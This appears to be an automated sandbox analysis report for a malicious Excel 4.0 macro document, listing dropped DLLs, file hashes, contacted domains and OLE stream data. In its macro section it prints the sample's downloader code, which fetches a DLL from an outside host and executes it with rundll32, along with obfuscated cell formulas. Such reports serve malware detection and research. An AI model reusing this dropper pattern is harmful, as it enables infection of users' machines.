	case (250).xls	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	case (1447).xls	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	case (850).xls	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	SecuriteInfo.com.Heur.18472.xls	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	case (1543).xls	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	case_1581.xls	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\ProgramData\formnet.dll	case (4374).xls	Get hash	malicious	Browse
	case (4335).xls	Get hash	malicious	Browse
	case (1522).xls	Get hash	malicious	Browse
	case (4374).xls	Get hash	malicious	Browse
	case (166).xls	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\Yzub\doa.dll	case (4374).xls	Get hash	malicious	Browse
	case (4335).xls	Get hash	malicious	Browse
	case (1522).xls	Get hash	malicious	Browse
	case (4374).xls	Get hash	malicious	Browse
	case (166).xls	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll	case (4374).xls	Get hash	malicious	Browse
	case (4335).xls	Get hash	malicious	Browse
	case (1522).xls	Get hash	malicious	Browse
	case (4374).xls	Get hash	malicious	Browse
	case (166).xls	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\formnet.dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	933888
Entropy (8bit):	6.687983171155114
Encrypted:	false
SSDEEP:	24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
MD5:	B0F3FA047F6AE39A145FD364F693638E
SHA1:	1951696D8ACA4A31614BB68F9DA392402785E14E
SHA-256:	0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
SHA-512:	86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
Malicious:	true
Joe Sandbox View:	Filename: case (4374).xls, Detection: malicious, Browse Filename: case (4335).xls, Detection: malicious, Browse Filename: case (1522).xls, Detection: malicious, Browse Filename: case (4374).xls, Detection: malicious, Browse Filename: case (166).xls, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	933888
Entropy (8bit):	6.687983171155114
Encrypted:	false
SSDEEP:	24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
MD5:	B0F3FA047F6AE39A145FD364F693638E
SHA1:	1951696D8ACA4A31614BB68F9DA392402785E14E
SHA-256:	0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
SHA-512:	86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
Malicious:	true
Joe Sandbox View:	Filename: case (4374).xls, Detection: malicious, Browse Filename: case (4335).xls, Detection: malicious, Browse Filename: case (1522).xls, Detection: malicious, Browse Filename: case (4374).xls, Detection: malicious, Browse Filename: case (166).xls, Detection: malicious, Browse
Reputation:	low
IE Cache URL:	https://rnollg.com/kev/scfrd.dll
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0CEE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	59781
Entropy (8bit):	7.769700892139639
Encrypted:	false
SSDEEP:	768:SwGBP++aB0WviH/WoTXZSzrSimIbCVpoWpgffXfQwz0:SwmW+aB3viH/WaI5xGVpoWpglz0
MD5:	96506B88A8B4897447C2DA1F9D7FFD71
SHA1:	5957A5F62CBD61CA5B251D8C600AFD1F3200305C
SHA-256:	6C2ACB7F16D49250E36727ED7407CB5222AB8B2861C545098D8EBBB088CCF5EF
SHA-512:	0DE6F3AB08375EAC57D6D145BB763A1AB8689C4F43F3B0F256884C6A0C592CF872BF14F158E2D495F8623C361906DC65DA34B04F9256118AB16B3442E0087E9F
Malicious:	false
Reputation:	low
Preview:	..n.0...'..".N...v.z.u.[.v.`.Cb...........U{n.....I.I...U.d..2zJX1"...H..).s.3?'..BK...S..O.g.?Ln..\|.....:...R_..._..:.,.kE.?]E.(....G.3Z..@.<..d6...q..j.oo..&...sIjJ...E.F.{".Y,T..wml]x.@H_...).SQ..@.qc...VW{..M........W.cs;."Vv[..S.....r\|.....:%!.....m..]5.....eq.I.f.sX.....V..\i1o ......Q..J=.Nl..Su.L..P.......@....}..c$>>#.....3$>.".q......l...s...$cX..0.a..BU.....W...2,d.X....c!+.BV.....Y9..r,d.X...u....."k.a....r.].....u....*l..)....1F.^....{\|H'.....x...N..L....cl.`.....T....\P....%j;..&...KB!.....m...........PK..........!..0O.&...........[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 27 04:37:45 2021, atime=Wed Jan 27 04:37:45 2021, length=12288, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.478981038639082
Encrypted:	false
SSDEEP:	12:85Q5NLgXg/XAlCPCHaXtB8XzB/2WGoQX+WnicvbbbDtZ3YilMMEpxRljKPTdJP9O:85kn/XTd6j95QYebDv3q2rNru/
MD5:	D17536E1426C67D544B2D72DC5DE3799
SHA1:	09550A083E191631D657C94E2795FB4DECE5AF4C
SHA-256:	E6043CC648368E153ACF3D55A766F13A3BBF15A4208A4A1C33A9AD9607BFC082
SHA-512:	FC1FE27B0B9EB079D4CE6F52C2FE3F8A38210E5A7B8B4191D443E92BF145EC7B497FFCC2E91F22F170C65A9B193ED3FBC07D22B531AE74B45B133520526DE953
Malicious:	false
Reputation:	low
Preview:	L..................F...........7G..r.e.n...r.e.n....0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....;R.,..Desktop.d......QK.X;R.,..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\302494\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......302494..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\case (1057).LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Jan 27 04:37:45 2021, atime=Wed Jan 27 04:37:46 2021, length=99328, window=hide
Category:	dropped
Size (bytes):	4076
Entropy (8bit):	4.537499931408496
Encrypted:	false
SSDEEP:	96:8Sk/XojFkNS32Qh2Sk/XojFkNS32Qh2Ik/XojFkNS32Qh2Ik/XojFkNS32Q/:8SZjFeQESZjFeQEIZjFeQEIZjFeQ/
MD5:	FB04A916D694DF3124E42A15E0CB6443
SHA1:	8BB0642C12F2B68059C66127D5554CCA241443BF
SHA-256:	55A3325CA98295F7B2CBE5C6DAC96F26F5A39738DC1F41A9094EC29A8A20CA9C
SHA-512:	2532A043F2FAA5C2E6D6198DADE77E6B0097222073528B5A2B3684E3596190819BF542BD6805191D82DF180B053D048D54DA694A44159B820FD201B3A8834C31
Malicious:	false
Reputation:	low
Preview:	L..................F.... ...&...{..r.e.n....to.n................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.%d..;R., .CASE(1~1.XLS..L.......Q.y.Q.y...8.....................c.a.s.e. .(.1.0.5.7.)...x.l.s.......y...............-...8...[............?J......C:\Users\..#...................\\302494\Users.user\Desktop\case (1057).xls.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.a.s.e. .(.1.0.5.7.)...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......302494..........D_....3N...W...9F.C...........[D_....3N...W...9F

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	176
Entropy (8bit):	4.499920910709369
Encrypted:	false
SSDEEP:	3:oyBVomMAMLUeIEMLUmMAMLUeIEMLUmMAMLUeIEMLUmMAMLUv:dj6AKJKmAKJKmAKJKmAK2
MD5:	46B3042494EAFEC48753A085FA3C43F2
SHA1:	0CB9D82BF8EC6B434F39762F6E77590381D64E85
SHA-256:	5073BC52701AB83F1BBF99326644E3EA91FF8004CF7550C9C6BFF3F9EBF6D828
SHA-512:	E67E7CD19B310EF6276C01A08D302A0413DEF27C5A516D40CBAEDE9F9FF3EB725BAE17730FF20DB2821E8CD08E2F81D344CD9BA3C31F8E2C584DFD4A151021C2
Malicious:	false
Reputation:	low
Preview:	Desktop.LNK=0..[xls]..case (1057).LNK=0..case (1057).LNK=0..[xls]..case (1057).LNK=0..case (1057).LNK=0..[xls]..case (1057).LNK=0..case (1057).LNK=0..[xls]..case (1057).LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\6E2XX33J.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	116
Entropy (8bit):	4.467932264038003
Encrypted:	false
SSDEEP:	3:GmM/0DMKECHTNHHdw2lSN+BT2SUd2WpvW3TRRhvXn:XM/xUt9webl24Wvc35Xn
MD5:	BC51AD6D86E70DA86A624A9592B84320
SHA1:	7D8820A967C16C776B636E0347ADD6F69C4F8550
SHA-256:	8F1F517526828293A6F6FD66074E3AE2B81AD50E10C07940779761A63D75A204
SHA-512:	F7F69095657F258706A19113BB458056F9DAADE426923396968ADC261A5253EB05475CC5C71F76B75DED13744F98AD5B8DECDF3B9C45DDCB06AE36EE5B3E3812
Malicious:	false
Reputation:	low
IE Cache URL:	gadgetswolf.com/
Preview:	__cfduid.da8f10a211fa7297b3f2769c41fe961d31611693529.gadgetswolf.com/.9728.947327616.30870454.1395433602.30864495.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\A8FFZF1B.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	118
Entropy (8bit):	4.4631998046001735
Encrypted:	false
SSDEEP:	3:GmM/UglUvyQT0qKJpKfcSNAK2SUa5cF4udRhvXn:XM/gvyQ4qv0HK2a5cl5Xn
MD5:	F671FBD2FBEFEF1791AE27109DA50175
SHA1:	9D79D13F382529E9F67701CB32941304BB8DF934
SHA-256:	AE489FE22A9E565AA940052E520676CEDA20E889C5CD6921C511219B377B35B8
SHA-512:	A77F2540B1710A2615BCE50C893FE00E7481C7D650C714122C64BD62B15FCC1F1DE754144DD6A90C77D3817003A4B07BB9A908E083FA7ED5CDE95A5A2BCE1E0F
Malicious:	false
Reputation:	low
IE Cache URL:	homesoapmolds.com/
Preview:	__cfduid.d5d3eb920f294449f1c9c9384e68085d51611693530.homesoapmolds.com/.9728.957327616.30870454.1406977623.30864495.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\HPDR9FYI.txt Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	111
Entropy (8bit):	4.404751650479022
Encrypted:	false
SSDEEP:	3:GmM/mPHhCWWBRTHWEPK6AoGT0cSNEQgUT2SUfFudRgvX:XM/OB8B1HWS7jSPK2fag/
MD5:	46BA3B0F9B7E8A14827348496984EB5B
SHA1:	6D039D97D25D5FEFC013C243615DCAADA337B573
SHA-256:	AD9C20F5E0CA87876C650764373C1A50C9101D18B90AB6433B6C33916A5A4105
SHA-512:	9901F42375C90F2B8FD96B358058D2557CA170CB34EB959E3C9493DC15C6521DFEC8EA5ED26310B107DB06377DA93544E00D62E40D031D06144FF44F31859733
Malicious:	false
Reputation:	low
IE Cache URL:	rnollg.com/
Preview:	__cfduid.ddb3f9db095ea4b1b77d21d33d469f13a1611693494.rnollg.com/.9728.597327616.30870454.2331920260.30864494.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\TXFJIAR6.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	114
Entropy (8bit):	4.290777651284624
Encrypted:	false
SSDEEP:	3:GmM/1GWXBEUndiHKBUTUKPMdl1cS8gUT2SUahUaLVRRRhvXn:XM/1BREIBUYkqlV812avj5Xn
MD5:	070B9681D06F299E6E66C79320D22753
SHA1:	8F5C298E04698FB570C12B1CCADA589D5BF35B5A
SHA-256:	D3364AC7B57548F74E6611033AA5B308470B8BEEEF734E21A157EF333C68A4A1
SHA-512:	AE9D2347A34F5EE04A592EC3C9473B5135F23E344D6189DA570D8CDBBAB6757111647F25AD25A06E1EC9EC1996C5BE3392CCA8DD7FF0B4A0C88D7CD64DE88479
Malicious:	false
Reputation:	low
IE Cache URL:	govemedico.tk/
Preview:	__cfduid.dfc18c32d8044506683938c277576c5631611693531.govemedico.tk/.9728.967327616.30870454.1413061633.30864495.*.

C:\Users\user\AppData\Roaming\Yzub\doa.dll Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	933888
Entropy (8bit):	6.687983171155114
Encrypted:	false
SSDEEP:	24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
MD5:	B0F3FA047F6AE39A145FD364F693638E
SHA1:	1951696D8ACA4A31614BB68F9DA392402785E14E
SHA-256:	0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
SHA-512:	86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
Malicious:	false
Joe Sandbox View:	Filename: case (4374).xls, Detection: malicious, Browse Filename: case (4335).xls, Detection: malicious, Browse Filename: case (1522).xls, Detection: malicious, Browse Filename: case (4374).xls, Detection: malicious, Browse Filename: case (166).xls, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\0DEE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	173366
Entropy (8bit):	5.331259235205298
Encrypted:	false
SSDEEP:	3072:9xrtdAOtyoVlDGUUlEfblBiPP58LmlPi+aEvthlXaEv93a6DxrtdAOtyoVlDGUUo:9xrtdAOtyoVlDGUUlEfblBeP52mlPi+r
MD5:	8C8D7D84B2CB8F595EE3FC5738CAE230
SHA1:	336EF5E051F17307FCCD0824165816592FE59D94
SHA-256:	339FECDBAC760952F2BE49CD806FC08F983053F2BFCBC921FB0677F57DE99D52
SHA-512:	4441451B64BE5EB008791C751DBDB99E4443F8ABEADB7B3AE10AE96F5E47D32132CA6C7D50C3A9D429ADAD0D9DC96B5882F25550EA73F12157331DA4F79C4AE2
Malicious:	false
Preview:	........g2..........................\.p....user B.....a.........=.@............................................................... .....................................=........K.$8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.o.r.b.e.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.(.@...............C.o.r.b.e.l. .L.i.g.h.t.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...@...,...........C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1.(.0...............C.o.r.b.e.l. .L.i.g.h.t.1.(.0...>...........C.o.r.b.e.l. .L.i.g.h.t.1.(.....>...........C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...0...............C.a.

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: , Last Saved By: , Name of Creating Application: Microsoft Excel, Last Printed: Tue Jan 26 16:17:13 2021, Create Time/Date: Thu Apr 23 13:26:24 2020, Last Saved Time/Date: Tue Jan 26 16:28:15 2021, Security: 0
Entropy (8bit):	3.8737964753083376
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	case (1057).xls
File size:	156709
MD5:	cbc37bc9a7ec9836c033708d090db81c
SHA1:	a1fbde54662fb5cdb677f5841a3603df30345108
SHA256:	95e0295b15b7c624febe347f44747dada5cb1fc79b73561b3153af81b351a8de
SHA512:	03c04ea7f7f64836491fa345f075f86f9e983770e0ce174daa2ee187a79c748b548b82c3a1c4f870d6390a616a03a8f713795c2b902d788c4bc2aa17e21d2f05
SSDEEP:	3072:49SUz4tH8vsderSh1yRNJd6zAtH8U5BXKjBPWlyTSgG+g1Z:49SUz4tH8vsderSh1yRNJdaAtH8U5B6W
File Content Preview:	........................>.......................0...........................-......./..........................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "case (1057).xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Code Page:	1251
Author:
Last Saved By:
Last Printed:	2021-01-26 16:17:13
Create Time:	2020-04-23 12:26:24
Last Saved Time:	2021-01-26 16:28:15
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.843601759481
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . ( . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j S R F q S o B P w O . . . . . M a c r o 2 . . . . . M a c r o 3 . . . . . M a c r o 4 . . . . . M a c r o 5 . . . . . M a c r o 6 . . . . . M a c r o 7 . . . . . M a c r o 8 . . . . . M a c r o 9 . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 28 02 00 00 06 00 00 00 01 00 00 00 38 00 00 00 0f 00 00 00 40 00 00 00 0b 00 00 00 4c 00 00 00 10 00 00 00 54 00 00 00 0d 00 00 00 5c 00 00 00 0c 00 00 00 e7 01 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 0b 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.362148031008
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . . g j . . . @ . . . . 9 . ? . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 68 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 02 00 00 00 e3 04 00 00

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145752

General
Stream Path:	Book
File Type:	Applesoft BASIC program data, first line number 8
Stream Size:	145752
Entropy:	3.94377585798
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . . . . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . L G u P G w K V E D q c E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . = . . . . . . . . Z . $ 8 .
Data Raw:	09 08 08 00 00 05 05 00 04 3d cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0e c0 ed e4 f0 e5 e9 20 c5 eb e8 f1 e5 e5 e2 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

CALL(URLMON, URLDownloadToFileA, "JJCCJJ", 0, "https://rnollg.com/kev/scfrd.dll", C:\ProgramData\BysKIez.dll, 0, 0)
CALL(Shell32, ShellExecuteA, "JJCCCCJ", 0, Open, "rundll32.exe", C:\ProgramData\BysKIez.dll, DllRegisterServer", 0, 0)

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR($FJ$1168-11),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($HL$1475),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($GW$1647),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,84,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,